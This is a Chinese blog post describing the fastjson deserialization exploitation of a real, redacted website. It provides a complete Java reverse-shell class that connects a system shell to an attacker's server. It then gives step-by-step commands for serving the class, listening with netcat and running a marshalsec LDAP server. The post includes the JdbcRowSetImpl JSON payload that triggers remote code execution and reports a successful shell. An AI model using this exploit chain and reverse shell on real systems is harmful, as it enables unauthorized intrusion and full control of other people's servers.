zoukankan      html  css  js  c++  java
  • fastjson反序列化漏洞实际案例利用

      fastjson反序列化rce实际案例利用全过程:

      存在问题网站:http://***.com/

      在网站上寻找一些安全漏洞的时候,发现一条json数据包

      数据包如下:

        

    POST /*** HTTP/1.1
    Host: ***
    Connection: close
    Content-Length: 100
    Accept: application/json, text/plain, */*
    Content-Type: application/json;charset=UTF-8
    Referer: *
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: *
    
    {"***":"***"}

      当我尝试输入:'a

        

    POST /*** HTTP/1.1
    Host: ***
    Connection: close
    Content-Length: 100
    Accept: application/json, text/plain, */*
    Content-Type: application/json;charset=UTF-8
    Referer: *
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: *
    
    {"***":"***'a"}

      发生了报错,报错信息:

      {"timestamp":1556677012822,"status":500,"error":"Internal Server Error","exception":"com.****.fastjson.JSONException.....}

      fastjson,立马想到fastjson反序列化漏洞。

      关于利用:需要两份文件

      1.reverse.java

      2.marshalsec-0.0.1-SNAPSHOT-all.jar

      提供reverse.java的代码:

      

    import java.io.BufferedReader;
    import java.io.BufferedWriter;
    import java.io.InputStream;
    import java.io.InputStreamReader;
    import java.io.OutputStream;
    import java.io.OutputStreamWriter;
    import java.net.Socket;
    
    public class reverse {
        class StreamConnector
          extends Thread
        {
          InputStream hx;
          OutputStream il;
          
          StreamConnector(InputStream hx, OutputStream il)
          {
            this.hx = hx;
            this.il = il;
          }
          
          public void run()
          {
            BufferedReader ar = null;
            BufferedWriter slm = null;
            try
            {
              ar = new BufferedReader(new InputStreamReader(this.hx));
              slm = new BufferedWriter(new OutputStreamWriter(this.il));
              char[] buffer = new char[8192];
              int length;
              while ((length = ar.read(buffer, 0, buffer.length)) > 0)
              {
                slm.write(buffer, 0, length);
                slm.flush();
              }
            }
            catch (Exception localException) {}
            try
            {
              if (ar != null) {
                ar.close();
              }
              if (slm != null) {
                slm.close();
              }
            }
            catch (Exception localException1) {}
          }
        }
        public reverse()
          {
            reverseConn("服务器ip:端口号");
          }
          
         public static void main(String[] args) 
        {
            System.out.println("0");
        }
    
          public void reverseConn(String ip)
          {
            String ipport = ip;
            try
            {
              String ShellPath;
              if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
                ShellPath = new String("/bin/sh");
              } else {
                ShellPath = new String("cmd.exe");
              }
              Socket socket = new Socket(ipport.split(":")[0], 
                Integer.parseInt(ipport.split(":")[1]));
              Process process = Runtime.getRuntime().exec(ShellPath);
              new StreamConnector(process.getInputStream(), 
                socket.getOutputStream()).start();
              new StreamConnector(process.getErrorStream(), 
                socket.getOutputStream()).start();
              new StreamConnector(socket.getInputStream(), 
                process.getOutputStream()).start();
            }
            catch (Exception e)
            {
              e.printStackTrace();
            }
          }
    }

      marshalsec-0.0.1-SNAPSHOT-all.jar网上可自行找到。

      测试服务器:阿里云服务器(CenterOS)

      需要具备的环境:1.jdk 1.8环境   2.apache服务 3.无apache自带python启动web服务

      jdk1.8安装参考:https://blog.51cto.com/kmt1994/2325949?source=dra

      apache服务配置嫌麻烦直接使用:  python -m SimpleHTTPServer 8000(以8000端口为例子),如果配置了apache访问是默认80端口

      访问http://服务器ip:8000 or http://服务器ip:80

      没apache(web)服务的操作过程如下:

      把reverse.java和marshalsec-0.0.1-SNAPSHOT-all.jar放到网站根目录下:

      操作1: javac reverse.java 生成reverse.class

      操作2: python -m SimpleHTTPServer 8000开启一个8000端口的web服务

      操作3: 新建窗口:nc -lvvp 1234   *监听的端口根据reverse.java中的端口进行配置互相匹配

      操作4:新建窗口:java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://服务器ip:8000/#reverse  10086

      操作5:构造数据包:

      

    POST /*** HTTP/1.1
    Host: ***
    Connection: close
    Content-Length: 100
    Accept: application/json, text/plain, */*
    Content-Type: application/json;charset=UTF-8
    Referer: *
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: *
    
    {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://服务器ip:10086/Object","autoCommit":true}

      发送数据包产生了一定延迟,查看操作3的窗口发现:

      反弹shell成功

      

      如果有apache服务,那么操作如下:

      操作1.在网站根目录下存放那两个文件,我的网站根目录/var/www/html

      操作2.javac reverse.java 生成reverse.class

      操作3.新建窗口:nc -lvvp 1234   *监听的端口根据reverse.java中的端口进行配置互相匹配  

      操作4:新建窗口:java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://服务器ip:80/#reverse  10086 *(apache服务端口默认80)

      操作5:构造数据包:

        

    POST /*** HTTP/1.1
    Host: ***
    Connection: close
    Content-Length: 100
    Accept: application/json, text/plain, */*
    Content-Type: application/json;charset=UTF-8
    Referer: *
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: *
    
    {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://服务器ip:10086/Object","autoCommit":true}

      发包产生延迟,然后查看操作3窗口:

      成功反弹shell

      

      关于坑:要在网站根目录下进行这些命令操作!

        

  • 相关阅读:
    【酷熊科技】工作积累 ----------- 随机数 (带权重的随机数)
    【酷熊科技】工作积累 ----------- unity scrollview 点击后会有偏移问题(有图片)
    cocos2dx混合模式应用———制作新手引导高亮区域 (2.2.0)
    3.20 内存及效率的一些总结 3.21 设置竖屏 3.22 CCLOG与CCLog区别
    3.18 CCProgressTo 进度计时器
    3.16 draw 3.17 更新函数
    3.15 获取当前设备语言
    CCControlSwitch 、CCControlSlider、CCControlButton
    CCEditBox
    CCTextFieldTTF 与 5种常用CCMenuItem
  • 原文地址:https://www.cnblogs.com/piaomiaohongchen/p/10799466.html
Copyright © 2011-2022 走看看